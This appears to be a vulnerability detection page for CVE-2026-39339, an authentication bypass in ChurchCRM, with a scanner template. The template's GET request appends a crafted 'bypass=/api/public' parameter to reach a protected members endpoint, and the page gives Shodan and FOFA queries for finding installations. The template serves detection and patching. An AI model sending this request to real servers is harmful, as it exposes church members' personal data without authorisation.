ChurchCRM - API Authentication Bypass via URL Injection
CVE-2026-39339
Verified
Description
ChurchCRM < 7.1.0 contains an authentication bypass caused by improper API middleware URL handling in ChurchCRM/Slim/Middleware/AuthMiddleware.php, letting unauthenticated attackers access protected API endpoints, exploit requires crafted request URL with 'api/public
Severity
Critical
CVSS Score
9.1
Exploit Probability
1%
Affected Product
churchcrm
Published Date
April 17, 2026
Template Author
akhilshekhar
CVE-2026-39339.yaml
id: CVE-2026-39339
info:
name: ChurchCRM - API Authentication Bypass via URL Injection
author: akhilshekhar
severity: critical
description: |
ChurchCRM < 7.1.0 contains an authentication bypass caused by improper API middleware URL handling in ChurchCRM/Slim/Middleware/AuthMiddleware.php, letting unauthenticated attackers access protected API endpoints, exploit requires crafted request URL with 'api/public
impact: |
Unauthenticated attackers can access all protected API endpoints, exposing sensitive church member data and system information.
remediation: |
Update to version 7.1.0 or later.
reference:
- https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v3p2-mx78-pxhc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2026-39339
epss-score: 0.01351
epss-percentile: 0.68164
cwe-id: CWE-284
cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
metadata:
vendor: churchcrm
product: churchcrm
shodan-query: http.title:"churchcrm"
fofa-query: app="churchcrm"
tags: cve,cve2026,churchcrm,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/api/persons/latest?bypass=/api/public"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PersonId"
- "FormattedName"
- "\"people\""
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100e74e4abc34ff253f7938dfc650acb2f29bbee39195114c1a90b386544ebd5b8f02207fc5576a58205223093ec23731654320bfbaa6258ca92dd63affa9ee74927e63:922c64590222798bb761d5b6d8e729509.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
cve-2026-39339
CWE ID:
cwe-284
Remediation Steps
Update to version 7.1.0 or later.